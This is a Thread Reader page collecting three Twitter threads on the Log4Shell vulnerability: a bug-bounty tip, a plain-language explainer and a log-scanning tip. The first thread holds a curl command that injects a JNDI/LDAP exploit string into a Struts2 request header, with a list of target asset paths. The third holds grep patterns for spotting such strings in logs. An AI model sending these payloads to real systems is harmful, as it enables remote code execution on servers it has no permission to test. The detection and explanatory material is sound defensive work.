Discover and read the best of Twitter Threads about #log4jRCE

Most recents (3)

Profile picture
payloadartist
@payloadartist
If you have a Struts2 target, you can try to find if its vulnerable to #Log4Shell

curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js

#bugbountytips #log4jRCE #bugbounty #infosec #cybersecurity #redteam 1/n Image
"DefaultStaticContentLoader" class which loads static assets in Struts2 logs a warning if the date passed in "If-Modified-Since" is invalid.

Reference:

attackerkb.com/topics/in9sPR2…

2/n
List of default static asset paths in Struts2 (taken from the Rapid7 analysis):

tooltip.gif
domtt.css
utils.js
domTT.js
inputtransfersselect.js
optiontransferselect.js

3/n
Read 3 tweets
Profile picture
Emy | eq 🌈
@entropyqueen_
Explaining #log4j for non technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there

#Log4Shell #log4jRCE

⬇️
Log4j is a popular logging library used in Java programming language.

A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (firefox, chrome, edge... ), when you made the request, what page you accessed... and more!
Read 10 tweets
Profile picture
Florian Roth ⚡️
@cyb3rops
Quick check in /var/log folder or where your apps store their logs

sudo grep -r '${jndi:ldap://' /var/log

#log4j #log4jrce
If you find something, please send me a redacted version of it - I'd like to see log lines of real world exploitation attempts
Improved version

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
Read 4 tweets

Related hashtags

#log4jRCE #bugbounty #bugbountytips #log4jrce #log4j #redteam #infosec #cybersecurity #Log4Shell

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!